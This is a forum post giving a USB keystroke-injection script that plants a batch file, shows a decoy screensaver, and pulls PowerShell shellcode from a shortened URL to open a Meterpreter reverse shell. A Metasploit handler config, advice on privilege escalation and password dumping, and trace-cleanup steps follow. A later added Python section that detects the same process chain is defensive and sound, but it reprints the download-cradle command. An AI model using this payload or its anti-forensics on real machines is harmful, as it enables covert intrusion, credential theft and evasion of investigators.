Xcellerator Posted September 26, 2013

Hey guys,

I've been playing around with PowerShell and also been looking into PowerSploit (I really suggest you look into PowerSploit - it's got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a Ducky script!

First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in Metasploit below.

```
REM Open the Run dialog and launch cmd
DELAY 5000
GUI r
DELAY 500
STRING cmd
ENTER
REM Stage a batch file in %TEMP% by typing it into "copy con"
STRING cd %TEMP%
ENTER
STRING copy con met.cmd
ENTER
STRING start C:/Windows/System32/Ribbons.scr /s
ENTER
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force"
ENTER
REM CTRL-Z then ENTER closes "copy con" and writes the file
CTRL z
ENTER
DELAY 100
REM Run the batch file, then close the cmd window
STRING met.cmd && exit
ENTER
```

Just make sure you remember to change <IP_ADDRESS> to your actual IP address and <PORT> to the port you want to run the session over.

Now, in a terminal window in a Linux distro (make sure you have Metasploit installed), make a file with this as its contents, obviously changing the values in < and > to match your settings:

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <IP_ADDRESS>
set LPORT <PORT>
exploit -j -z
```

Name it whatever you want with a .rc extension.

### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL ###

Run this in the terminal:

```
msfconsole -r ./fileyoujustmade.rc
```

Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permission problems if you try to use port 443 on Debian systems without being root.)

Now, run the payload from the Ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky.
It may take up to 10 seconds for you to receive your shell, as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the Meterpreter into memory.

Issues I encountered: I found that my Metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit Enter to get the msf prompt back, and then connect into the Meterpreter session and run smart_migrate manually. smart_migrate can be found at post/windows/manage/smart_migrate in the Metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe, which DOES NOT have administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (if you want to dump Firefox/Chrome/IE passwords or hashes, or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower-security environments.

For the Forensics Conscious: If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps:

1. Delete met.cmd from %TEMP% - you don't want it to come back to bite you on the ass once you're done with the machine.
2. Kill the powershell.exe process once you've migrated out of it.

Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P
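As an added example, not part of Xcellerator's post, PowerSploit or Metasploit: the procedure above leaves a distinctive process-creation trail on the target (cmd.exe spawned from explorer.exe, a .scr decoy started with /s, and powershell.exe running an IEX/DownloadString cradle into Invoke-Shellcode from %TEMP%). The Python below scores Sysmon-style process events for that chain, which is what a defender would look for; the '|'-separated key=value record layout, the field names, the point values and the alert threshold are assumptions made for this example, and the log lines are constructed, not captured from a real host.

```python
"""Score process-creation events for the cmd -> copy con -> PowerShell cradle chain.

Added example, not from the original post. Record layout, field names, point values
and threshold are assumptions; SAMPLE_LOG is constructed test data.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

FIELD_RE = re.compile(r"(\w+)=(.*)")  # assumed key=value field syntax

# IEX over WebClient.DownloadString: the classic in-memory download cradle.
CRADLE_RE = re.compile(r"\b(IEX|Invoke-Expression)\b.*DownloadString\s*\(", re.I)
# URL shorteners hide where the script actually comes from.
SHORTENER_RE = re.compile(r"https?://(bit\.ly|tinyurl\.com|goo\.gl|t\.co|is\.gd)/", re.I)
# Invoke-Shellcode loading a meterpreter stager straight into memory.
SHELLCODE_RE = re.compile(r"Invoke-Shellcode\b.*-Payload\s+windows/\S*meterpreter", re.I)
# A screensaver launched with /s (run it now) used as a visual decoy.
SCREENSAVER_RE = re.compile(r"\.scr\b.*\s/s\b", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp(\\|$)", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cwd: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    pid: int
    score: int
    reasons: List[str] = field(default_factory=list)


def parse_log(text: str) -> List[ProcEvent]:
    """Parse '|'-separated key=value records (assumed layout) into events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        kv = {}
        for part in line.split("|"):
            m = FIELD_RE.fullmatch(part)
            if m:
                kv[m.group(1)] = m.group(2)
        events.append(ProcEvent(int(kv["pid"]), int(kv["ppid"]), kv["image"],
                                kv.get("cwd", ""), kv.get("cmdline", "")))
    return events


def score_event(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
                children: Dict[int, List[ProcEvent]]) -> Optional[Finding]:
    """Score one PowerShell launch using its command line, parent and siblings."""
    if ev.name not in ("powershell.exe", "pwsh.exe"):
        return None
    f = Finding(ev.pid, 0)
    parent = by_pid.get(ev.ppid)
    siblings = [s for s in children.get(ev.ppid, []) if s.pid != ev.pid]

    def hit(points: int, reason: str) -> None:
        f.score += points
        f.reasons.append(reason)

    if CRADLE_RE.search(ev.cmdline):
        hit(3, "download cradle: IEX over DownloadString")
    if SHORTENER_RE.search(ev.cmdline):
        hit(1, "URL shortener hides the script host")
    if SHELLCODE_RE.search(ev.cmdline):
        hit(3, "Invoke-Shellcode with a meterpreter payload")
    if parent is not None and parent.name == "cmd.exe" and TEMP_RE.search(ev.cwd):
        hit(1, "spawned by cmd.exe with %TEMP% as working directory")
    if any(SCREENSAVER_RE.search(s.cmdline) for s in siblings):
        hit(1, "sibling process launched a screensaver with /s (decoy)")
    return f if f.score else None


def hunt(text: str, threshold: int = 4) -> List[Finding]:
    """Return findings at or above threshold; a lone cradle (3 points) stays below it."""
    events = parse_log(text)
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    return [f for e in events
            if (f := score_event(e, by_pid, children)) is not None and f.score >= threshold]


# Constructed sample telemetry: the post's chain (pids 5120-5150), a harmless
# PowerShell launch (6000) and an admin running a cradle-style installer (6010).
SAMPLE_LOG = r"""
pid=1288|ppid=1100|image=C:\Windows\explorer.exe|cwd=C:\Users\bob|cmdline=C:\Windows\explorer.exe
pid=5120|ppid=1288|image=C:\Windows\System32\cmd.exe|cwd=C:\Users\bob|cmdline="C:\Windows\System32\cmd.exe"
pid=5140|ppid=5120|image=C:\Windows\System32\Ribbons.scr|cwd=C:\Users\bob\AppData\Local\Temp|cmdline=C:/Windows/System32/Ribbons.scr /s
pid=5150|ppid=5120|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cwd=C:\Users\bob\AppData\Local\Temp|cmdline=powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.0.2.10 -Lport 443 -Force"
pid=6000|ppid=1288|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cwd=C:\Users\bob|cmdline=powershell.exe -NoProfile -Command Get-Service
pid=6005|ppid=1288|image=C:\Windows\System32\cmd.exe|cwd=C:\Users\admin|cmdline="C:\Windows\System32\cmd.exe"
pid=6010|ppid=6005|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cwd=C:\Users\admin|cmdline=powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))"
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(f"pid {finding.pid}: score {finding.score}")
        for reason in finding.reasons:
            print("  -", reason)
```

Run stand-alone it flags only pid 5150 (score 9, all five indicators). Pid 6010 carries a cradle too but scores 3 and stays under the threshold, which is the point of combining the weak signals (cmd.exe parent, %TEMP% working directory, the .scr sibling) with the strong ones rather than alerting on DownloadString alone. Note that the "forensics conscious" steps in the post (deleting met.cmd, killing powershell.exe) do nothing about this trail: the process-creation events are written at launch time and survive both.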